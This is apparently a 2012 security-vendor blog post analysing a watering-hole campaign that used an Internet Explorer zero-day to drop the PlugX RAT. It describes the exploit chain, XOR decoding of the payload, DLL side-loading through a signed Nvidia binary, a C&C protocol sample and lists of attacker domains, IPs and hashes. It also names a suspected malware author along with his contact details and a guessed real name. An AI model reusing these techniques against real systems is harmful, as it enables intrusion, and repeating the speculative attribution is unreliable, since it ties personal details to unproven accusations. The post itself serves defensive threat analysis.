The connection between the Plugx Chinese gang and the latest Internet Explorer Zeroday

September 18, 2012  |  Jaime Blasco

Some hours ago my friend PhysicalDrive0 pointed me to a new version of Moh2010.swf that was found in the wild as part of some content exploiting the last Internet Explorer Zeroday.

The exploit code was being served on www.nod32XX.com hosted on:

The exploit scheme is the same one, the original vector is hosted under /Exploit.html. It setups the img content and load the Moh2010.swf  file:

- The file Moh2010.swf is a bit different than the previous one. It is also encrypted using DoSWF but the encrypted content is different:

 

 

We can also check that DoSWF is licensed to bnetbgm@163.com.fr:

 

 

Once the SWF file is executed it loads a new iframe:

evalRdocument.body.innerHTML=“x

This file is very similar to the Protect.html one that we described in our report yesterday.

 

 

It triggers the actual vulnerability. The swf file has sprayed the heap and the shellcode is in charge of downloading, decrypting and executing the payload.

The HTTP headers on the server indicates that the files have been created four days ago meaning that the Zeroday vulnerability wasn’t mainstream yet:

last-modified: Fri, 14 Sep 2012 05:29:51 GMT

Last-Modified: Fri, 14 Sep 2012 05:30:07 GMT

Due to the encryption of the SWF file using DoSWF the easiest way to obtain the original file is attaching to Internet Explorer and dumping the decrypted SWF file:

 

 

On the decrypted SWF file we found a Bytearray:

 

 

If we apply a base64 decode and then we apply a XOR E2 operation we obtain the URL of the malicious payload:

www.nod32XX.com/test.exe (md5: fef2d60ec7ec015f1e119dc469b14f59)

As we can see the content is obfuscated somehow. If we apply a XOR 70 operation on the bytes which value differs from 00 or 70 we obtain the original payload md5: 00fdb6ad7345c0912ea9d2fa4c49950e.

The malicious payload contains several resources that are decompressed (Winrar) during execution:

C:DOCUME~1ADMINI~1LOCALS~1TempRarSFX0Nv.exe MD5: 09B8B54F78A10C435CD319070AA13C28

C:DOCUME~1ADMINI~1LOCALS~1TempRarSFX0Nv.mp3 MD5: B29265A6932E1FC4DEE6FA6908413A50

C:DOCUME~1ADMINI~1LOCALS~1TempRarSFX0NvSmartMax.dll MD5: 0B21678ED8E2B117344CFCEBA8F097DD

The file NvSmartMax.dll is familiar, isn’t it? We described this technique http://labs.alienvault.com/labs/index.php/2012/tracking-down-the-author-of-the-plugx-rat/ [no longer available] some days ago. The file Nv.exe algo known as NvSmart.exe is a benign file signed by Nvidia and used widely by Nvidia in several applications.

 

 

Once Nv.exe is executed it loads NvSmartMax.dll that has been modified to execute the binary content present on  Nv.mp3.

 

 

Due to the fact that Nv.exe is digitally signed with a valid certificate it can bypass some of the Operating System restrictions and this technique is used to execute the malicious payload every time the system is booted.

Surprise!. The actual payload present on Nv.mp3 is a version of the PlugX RAT that we uncovered a few days ago. Do you remember WHG, the guy behind it?.

We can find the same debug path that we found in our previous blog post:

d:workplug4.0(nvsmart)(sxl)shellcodeshellcodeXSetting.h

d:workplug4.0(nvsmart)(sxl)shellcodeshellcodeXPlug.h

The RAT connect to the C&C server on exchange.likescandy.com currently pointing to 108.171.193.92:

The RAT uses the well know Update Protocol, example:

POST /upda

te?id=000f6b50 HTTP/

1.1

Accept: */

*

X-Session:

 0

X-Status: 

0

X-Size: 61

456

X-Sn: 1

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET CLR 1.1.4322; .NET CLR1.0.3705) Host: exchange.likes

candy.com

Content-Le

ngth: 0

Connection: Keep-Ali

ve

Cache-Control: no-cache

Summary

We know that the group actively using the PlugX malware also called Flowershow had access to the Internet Explorer ZeroDay days before it was uncovered. Due tot he similarities of the new discovered exploit code and the one discovered some days ago it is very likely that the same group is behind both instances.

They are using the PlugX RAT as well as the NvSmart technique found in previous targeted attacks in the past. In our previous post we were able to identify the author of this RAT and due to the similarities of the attacks it is very likely that the guy is involved somehow in this code.

We’ve identify several ip addresses and domains that are currently used by this gang including:

aol.selfip.com 180.210.204.180

inmailbase.selfip.com 180.210.204.180

exchange.from-sc.com 180.210.204.180

exchange.likescandy.com 180.210.204.180

exchange.is-a-landscaper.com 180.210.204.180

leanov.gicp.net 180.210.204.180

netbastthebash.dnsalias.net 180.210.204.180

wwwh4ck.3322.org 180.210.204.180

gary-freudenberger.homeftp.org 180.210.204.180

aol.selfip.com 142.4.46.203

ns18.doomdns.com 142.4.46.203

exchange.from-sc.com 142.4.46.203

exchange.likescandy.com 142.4.46.203

exchange.is-a-landscaper.com 142.4.46.203

I recommend you to check your logs for connections to those IPs/Domains to identify if your systems are targeted by them.

More information regarding WHG

After some research on Whg we were able to get some new information about him:

- Whg went to Xihua (Sichuan province) University as revealed by other mail adress (whg0001@263.com)

. You can find  references on Baidu/others where he talks about the university as well as source code written when he was a student.

http://en.wikipedia.org/

wiki/Network_Crack_Program_Hacker_(NCPH)_Group

 

“The Network Crack Program Hacker (NCPH) group is a Chinese hacker group based out of Zigong in Sichuan Province”
“Wicked Rose credits the Chinese hacker WHG, also known as “fig” as one of the developers of the GinWui rootkit. WHG is an expert in malicious code”
“Security researchers discovered the rootkit on 18 May 2006 attackers utilized it in attacks on the US and Japan. Attackers introduced it to the US in an attack against a Department of Defense entity. They used two different versions of the rootkit in attacks during May and June 2006.”
“After winning the military network attack/defense competition, the group obtained a sponsor who paid them 2000 RMB per month. IDefense believes their sponsor is likely the People’s Liberation Army (PLA) but has no definitive evidence to support this claim.”
 
 
“Tan Dailin was a graduate student at Sichuan University when he was noticed (for attacking a Japanese site) by the People’s Liberation Army (PLA) in the summer of 2005. He was invited to participate in a PLA-sponsored hacking contest and won. He subsequently participated in a one-month, 16-hour-per-day training program where he and the other students simulated various cyber invasion methods, built dozens of hacking exploits, and developed various hacking tactics and strategies. He was chosen for the Sichuan regional team to compete against teams from Yunnan, Guizhou, Tibet, and Chongqing Military Districts. His team again ranked number one and he won a cash prize of 20,000 RMB.

Then, under the pseudonym Wicked Rose, he formed the Network Crack Program Hacker (NCPH) Groupand recruited other talented hackers from his school. He found a funding source (an unknown benefactor) and started attacking US sites. After an initial round of successful attacks, his funding was tripled. All through 2006, NCPH built sophisticated rootkits and launched a barrage of attacks against multiple US government agencies. By the end of July, 2006, NCPH had created some 35 different attack variants for one MS Office vulnerability. During the testing phase, NCPH used Word document vulnerabilities. They switched to Excel and later to PowerPoint vulnerabilities. The result of all of this activity is that the NCPH group siphoned thousands, if not millions, of unclassified US government documents back to China.”


WHG is not a core member of NCPH but a close affiliate of Wicked Rose.  WHG appears to be central to development of the NCPH rootkit, aka GinWui.  WHG is credited by Wicked Rose as one of the authors of this malicious code.  WHG is an experienced malicious code author with the following contact information:

  • E-mail address: whg@163.com
  • QQ Number: 312016
  • Website: http://cnasm.com
  • Real Name: May be “Zhao Jibing”,赵纪斌.
  • Location: Believed to be employed in the Sichuan province of China.

Warlock: Master of the Arcane game

 After reviewing the files used to exploit the Internet Explorer vulnerability we’ve identified that those guys are fans of a game called “Warlock: Master of the Arcane”. The are using several variables inside the code that refers to Warlock’s Great Mages names. Some examples are:

King Lich V inside the decrypted SWF file

 

Elpiritster();‘onselect=‘TestArray()’> on the Eternalian.html file.

I hope you enjoyed this blog post!

Update:

 

During the last few hours we found two more sites that were serving the Zeroday exploit in the past.

The first file we found was a version of Protect.html that was being served in the webpage of one of the main Defense News Portal in India. It contains code to trigger the Internet Explorer vulnerability and it was being served four days ago. We couldn’t retrieve the actual payload and it seems the malicious content is not there anymore.

The second server that was serving the exploit seems to be a fake domain of the 2nd International LED professional Symposium +Expo and it was taken down a few hours ago:

led-professional-symposium.org

Created On:06-Jul-2012 07:04:31 UTC

Last Updated On:18-Sep-2012 17:08:27 UTC

Expiration Date:06-Jul-2013 07:04:31 UTC

Sponsoring Registrar:GoDaddy.com, LLC (R91-LROR)

Status:CLIENT DELETE PROHIBITED

Status:CLIENT RENEW PROHIBITED

Status:CLIENT TRANSFER PROHIBITED

Status:CLIENT UPDATE PROHIBITED

Registrant ID:CR118174435

Registrant Name:Gexin sun

Registrant Street1:Yaroslaviv Val Street, Kyiv, 01034,

Registrant City:Kiev

Registrant State/Province:Kiev

Registrant Postal Code:03022

Registrant Country:UA

Registrant Phone:+380.952756104

Registrant Email:kathycat88@gmail.com

The first vector was hosted under led.html:

 

 

The code is very similar to the previous ones. Notice that the name of the swf used is different Grumgog.swf. Also notice that Grumgog is also a term used in the “Warlock: Master of the Arcane game”

The flash file is also encrypted with DoSWF using the license key issued to “bnetbgm@163.com.fr” as in the previous version.

Once decrypted we identified that an iframe is loaded (Dodge.html). We couldn’t retrieve the original content.

Once the vulnerability is triggered, the malicious payload is downloaded from update.exe (the file was removed at the time of the analysis).

It seems the guys behind this 0day were targeting specific industries. We’ve seen that they compromised a news site related to the defense industry and they created a fake domain related to LED technologies that can be used to perform spearphishing campaigns to those industries.

Share this with others

Get price Free trial